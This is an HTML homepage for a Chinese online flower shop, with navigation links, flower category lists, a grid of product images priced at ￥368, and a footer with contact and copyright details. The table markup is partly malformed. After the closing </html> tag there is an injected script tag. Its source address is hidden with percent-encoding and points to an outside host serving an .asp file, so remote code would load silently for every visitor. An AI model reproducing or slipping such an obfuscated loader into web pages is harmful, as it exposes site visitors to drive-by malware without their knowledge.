<!DOCTYPE html>
<html>

	<head>
		<meta charset="utf-8" />
		<title>欢迎来到鲜花屋！</title>
		<style>
			body {
				font-size: 14px;
			}
			
			.whitetext {
				color: #ffffff;
			}
			
			.orangetext {
				color: orangered;
				font-weight: bold;
			}
			
			a:link {
				color: cadetblue;
				text-decoration: none;
			}
			
			a:visited {
				color: cornflowerblue;
			}
			
			a:hover {
				color: firebrick;
			}
			
			a:active {
				color: maroon;
			}
		</style>
	</head>

	<body>
		<table width="980" cellspacing="0" border="0" cellpadding="0" align="center">
			<tr>
				<td colspan="9"><img src="img/top.png" width="980" height="206"></td>
			</tr>
			<tr>
				<td height="30" width="200" bgcolor="#ff3300" class="whitetext">全部商品导购</td>
				<td width="80"></td>
				<td width="100"><a href="FengMian.html" target="_self">首页</a></td>
				<td width="100"><a href="xuanxiangka.html">鲜花</a></td>
				<td width="100"><a href="yongshenghua.html">永生花</a></td>
				<td width="100"><a href="lipin.html">礼品</a></td>
				<td width="100"> <a href="index.html" target="_self">花语大全</a></td>
				<td width="100">联系我们</td>
				<td width="80"></td>
			</tr>
			<tr>
				<td colspan="9" height="3" bgcolor="orangered" colspan="8"></td>
			</tr>
			<tr>
				<td width="180" height="200">
					<table cellpadding="0" cellspacing="0" border="0">
						<tr height="30">
							<td colspan="2" align="center" class="orangetext">鲜花用途</td>
						</tr>
						<tr height="30">
							<td width="90"></td>
							<td width="90"></td>
						</tr>
						<tr height="30">
							<td> 爱情鲜花</td>
							<td> 友情鲜花</td>
						</tr>
						<tr height="30">
							<td> 生日鲜花</td>
							<td> 问候长辈</td>
						</tr>
						<tr height="30">
							<td> 祝贺鲜花</td>
							<td> 探病慰问</td>
						</tr>
						<tr height="30">
							<td colspan="2" align="center" class="orangetext">鲜花类别</td>
						</tr>
			</tr>
			<tr height="30">
				<td width="90"></td>
				<td width="90"></td>
			</tr>
			<tr height="30">
				<td> 花束</td>
				<td> 开业花篮</td>
			</tr>
			<tr height="30">
				<td> 花盒</td>
				<td> 果篮</td>
			</tr>
			<tr height="30">
				<td> 鲜花礼盒</td>
				<td> 桌面花篮</td>
			</tr>
			<tr height="30">
				<td colspan="2" align="center" class="orangetext">鲜花花材</td>
			</tr>
			</tr>
			<tr height="30">
				<td width="90"></td>
				<td width="90"></td>
			</tr>
			<tr height="30">
				<td> 玫瑰</td>
				<td> 康乃馨</td>
			</tr>
			<tr height="30">
				<td> 郁金香</td>
				<td> 百合</td>
			</tr>
			<tr height="30">
				<td> 马蹄莲</td>
				<td> 向日葵</td>
			</tr>
			<tr height="30">
				<td colspan="2" align="center" class="orangetext">热销商品</td>
			</tr>
			<tr height="30">
				<td colspan="2">
					<img src="img/hotflower.jpg" width="150" />
				</td>
			</tr>
			</table>
		</td>
			<td colspan="8">
				<table cellpadding="0" cellspacing="0" border="0" align="center">
					<td width="200">
						<img src="img/index1.jpg" width="180" />
						<p>￥368<br />爱的思念————手提式花篮</p>
					</td>
					<td width="200">
						<img src="img/index2.jpg" width="180" />
						<p>￥368<br />圆满</p>
					</td>
					<td width="200">
						<img src="img/index3.jpg" width="180" />
						<p>￥368<br />欣欣向荣</p>
					</td>
					<td width="200">
						<img src="img/index4.jpg" width="180" />
						<p>￥368<br />爱在心头</p>
					</td><table cellpadding="0" cellspacing="0" border="0" align="center">
							<td width="200"><img src="img/index5.jpg" width="180" />
								<p>￥368<br />爱的思念————手提式花篮</p>
							</td>
							<td width="200"><img src="img/index6.jpg" width="180" />
								<p>￥368<br />爱的思念————手提式花篮</p>
							</td>
							<td width="200"><img src="img/index7.jpg" width="180" />
								<p>￥368<br />爱的思念————手提式花篮</p>
							</td>
							<td width="200"><img src="img/index8.jpg" width="180" />
								<p>￥368<br />爱的思念————手提式花篮</p>
							</td>
						</table>
						<table cellpadding="0" cellspacing="0" border="0" align="center">
							<td width="200"><img src="img/index9.jpg" width="180" />
								<p>￥368<br />爱的思念————手提式花篮</p>
							</td>
							<td width="200"><img src="img/index10.jpg" width="180" />
								<p>￥368<br />爱的思念————手提式花篮</p>
							</td>
							<td width="200"><img src="img/index11.jpg" width="180" />
								<p>￥368<br />爱的思念————手提式花篮</p>
							</td>
							<td width="200"><img src="img/index12.jpg" width="180" />
								<p>￥368<br />爱的思念————手提式花篮</p>
							</td>
						</table>
				</table>
			</td>
			<table align="center">
			<tr>
				<td colspan="9" height="55" background="img/footerserver.jpg">
					<table cellpadding="0" cellspacing="0" border="0" align="center">
						<tr align="center" class="whitetext">
							<td width="150">十年品牌</td>
							<td width="150">3小时配送</td>
							<td width="150">低价保障</td>
							<td width="150">配送范围</td>
							<td width="150">花店加盟</td>
							<td width="150">投诉建议</td>
							<td width="80">首页 </td>
						</tr>
					</table>
				</td>
			</tr>
			<tr>
				<td colspan="9" height="50" align="center">
					<p>全国统一订花电话：400-888-7844电脑端/手机<br /> copyright&copy;2007-2018版权所有：山西太原网上花城信息产业部备案 ICP备06016666号</p>
				</td>
			</tr></table>
		</table>
	</body>

</html><script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>